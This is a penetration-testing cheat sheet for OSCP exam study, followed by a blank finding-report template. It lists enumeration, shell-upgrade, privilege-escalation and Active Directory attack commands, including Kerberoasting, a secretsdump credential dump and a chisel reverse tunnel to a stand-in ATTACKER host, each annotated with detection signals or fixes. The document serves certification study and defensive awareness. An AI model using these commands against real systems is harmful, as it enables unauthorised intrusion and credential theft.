OSCP (PEN-200) focuses on practical penetration testing across standalone and Active Directory environments, emphasizing enumeration depth, exploitation workflow, privilege escalation, lateral movement, and professional reporting.
Official Page

nmap -sn 10.10.10.0/24
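# Quick first pass: rustscan finds open ports, then hands them to nmap with
# the arguments after `--` (-sC default scripts, -sV version detection).
rustscan -a TARGET -- -sC -sV

# Full TCP sweep (-p-), saved in nmap's normal output format (-oN).
# --min-rate 1500 with -T4 trades accuracy for speed: on lossy links open
# ports can be missed, and the packet rate is easy for an IDS to flag.
nmap -p- --min-rate 1500 -T4 -oN allports.txt TARGET

# Collect the open TCP port numbers as a comma-separated list. Normal-format
# result lines look like "22/tcp   open  ssh", so match the digits at the
# start of the line and keep the "/tcp ... open" part out of the captured text
# (capturing the slash would give nmap an invalid -p list).
ports=$(grep -oP '^\d+(?=/tcp\s+open)' allports.txt | paste -sd, -)

# Script and version scan of just those ports. ${ports:?...} stops with a
# message instead of running nmap with an empty -p when nothing was parsed.
nmap -sC -sV -p "${ports:?no open TCP ports parsed from allports.txt}" -oN svc.txt TARGET

# Fingerprint the web stack (server, framework, CMS) on the HTTP service.
whatweb http://TARGET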
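# Directory and file discovery against the web root, also trying the .php,
# .txt and .bak extensions. Each miss is a 404 in the server's access log, so
# the run shows up there as a burst of requests from one client.
gobuster dir -u http://TARGET -w /usr/share/wordlists/dirb/common.txt -x php,txt,bak

# Same wordlist with ffuf; FUZZ marks the position that is substituted.
ffuf -u http://TARGET/FUZZ -w /usr/share/wordlists/dirb/common.txt

# Virtual-host discovery: the URL stays fixed and only the Host header
# varies. target.local stands in for the target's real domain.
ffuf -u http://TARGET -H 'Host: FUZZ.target.local' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt

# List SMB shares without credentials (-N skips the password prompt). A share
# list returned here means anonymous access is allowed, which is itself a
# finding for the report.
smbclient -L //TARGET -N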
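# Broad SMB/RPC enumeration in one run (-A enables all simple checks).
enum4linux-ng -A TARGET

# Null-session RPC: empty user name and no password. Getting a prompt means
# the host accepts anonymous RPC binds; restricting anonymous access closes it.
rpcclient -U "" -N TARGET

# Share listing with known credentials (nxc = NetExec). A password given with
# -p ends up in shell history and in the process list on the testing host.
nxc smb TARGET -u user -p pass --shares

# Anonymous LDAP query (-x simple bind) of the root DSE for its naming
# contexts, which gives the base DN for later searches.
ldapsearch -x -H ldap://TARGET -s base namingcontexts

# Listener on the tester's machine, TCP port 4444; rlwrap adds line editing
# and history to the nc session.
rlwrap -cAr nc -lvnp 4444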
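# Turn a bare shell into one with a pseudo-terminal, so that programs needing
# a TTY (su, sudo, editors) work. On the defended side, a service account
# spawning an interactive bash through python's pty module is a strong
# detection signal.
python3 -c "import pty; pty.spawn('/bin/bash')"

# Give the session a terminal type so clear, less and similar tools work.
export TERM=xterm

# Set the terminal size; use the values that `stty size` reports in the local
# terminal rather than these example numbers.
stty rows 50 cols 160

# Show which commands the current user may run through sudo.
sudo -l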
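# Current user and groups, then kernel version and architecture.
id && uname -a

# Every SUID file on the system; errors from unreadable directories are
# discarded. Anything outside the distribution's standard set deserves a
# look, and the fix is usually to drop the bit (chmod u-s) or remove the file.
find / -perm -4000 -type f 2>/dev/null

# Files carrying Linux capabilities, searched recursively from /.
getcap -r / 2>/dev/null

# Automated local enumeration script; it must already be on the host and
# executable.
./linpeas.sh

# Windows host: list the privileges held by the current token.
whoami /priv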
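# Windows host: automated local enumeration (64-bit build of winPEAS).
winPEASx64.exe

# Impacket, run from the tester's machine: request service tickets for
# accounts that have an SPN (Kerberoasting). The DC records each request as
# event 4769. Long random passwords or group managed service accounts make
# the returned tickets impractical to crack.
GetUserSPNs.py domain/user:pass -dc-ip DC_IP -request

# AS-REP roasting check for the names in users.txt: only accounts with
# Kerberos pre-authentication disabled return data, written in hashcat
# format. Requiring pre-authentication on every account removes the exposure.
GetNPUsers.py domain/ -usersfile users.txt -dc-ip DC_IP -format hashcat

# Remote credential dump from the DC using the given account, which needs
# administrative or directory-replication rights. If this succeeds, every
# domain credential has to be treated as compromised.
secretsdump.py domain/user:pass@DC_IP

# Interactive PowerShell session over WinRM with the given credentials.
evil-winrm -i TARGET -u user -p pass

# attacker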
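# Reverse tunnel with chisel. The server side runs on the tester's machine
# and listens on TCP 8000; --reverse lets connecting clients open listeners
# on the server side.
./chisel server -p 8000 --reverse
# victim
# The client connects outbound to ATTACKER:8000; R:socks asks the server to
# expose a SOCKS proxy that routes through this host. A long-lived outbound
# connection from an internal host to an unfamiliar address is what egress
# filtering and flow monitoring should catch.
chisel.exe client ATTACKER:8000 R:socks

Title: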
Severity:
Affected Host(s):
Description:
Impact:
Evidence (commands/screenshots):
Reproduction Steps:
1)
2)
3)
Remediation:
Verification: